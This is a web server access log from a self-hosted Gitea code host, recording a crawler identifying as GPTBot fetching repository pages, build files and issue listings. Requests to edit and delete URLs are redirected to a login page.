"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:17:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:17:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17361] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21437] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17362] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21436] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21436] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11058] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" -[17/Feb/2026:17:31:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:31:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:31:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15644] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15646] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15643] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15643] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15644] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15646] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15644] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:17:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 9800] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:17:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13929] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9953] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17053] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17055] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17055] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17056] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17055] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17056] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17054] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11322] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr 